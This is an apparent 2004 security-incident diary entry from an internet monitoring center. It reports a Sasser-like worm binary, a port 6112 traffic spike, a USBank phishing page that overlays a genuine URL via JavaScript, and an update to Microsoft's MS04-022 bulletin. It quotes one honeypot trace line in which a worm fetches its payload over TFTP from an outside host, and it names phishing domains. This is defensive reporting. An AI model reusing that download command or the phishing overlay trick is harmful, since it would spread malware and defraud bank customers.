Vsmons.exe / Port 6112 / USBank phishing / MS04-22 Update

Published: 2004-07-20
Last Updated: 2004-07-20 22:39:31 UTC
by Pedro Bueno (Version: 1)
0 comment(s)

We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of such application, please send to us, and our malware group will take a look at it.

UPDATE: this looks like sasser. The following hpot trace shows similar file:

tftp -i xxx.xxx.91.114 get vsmons.exe


Reference: http://wilderssecurity.com/showthread.php?t=41732
Traffic Spikes

Another report related strange traffic is about port 6112 TCP. A user noticed a spike on this port and wonder if such may be result of the recent CDE vulnerability. There were some recent spikes on the last 40 days, according ISC data, but the sources remain stable.

Reference: http://isc.sans.org/port_details.php?port=6112
USBank phishing

We received a USBank phishing report. This one is interesting because it uses a javascript to create a window with a valid usbank url on the top of the fake url.
This is interesting but not new. A post at bugtraq on may 13, shows a very similar phishing. The difference here is the fake url, that in this example is http://www.usbnk-update.info/secure and in the previous was http://validation-required.info .
Again, this only works on IE.

Reference: http://www.securityfocus.com/archive/1/363326

MS04-22 Update

Microsoft just updated the MS04-22 security bulletin. You will find more work arounds. This may help some people that had some problems with the patch.

Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx


Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)
0 comment(s)


Diary Archives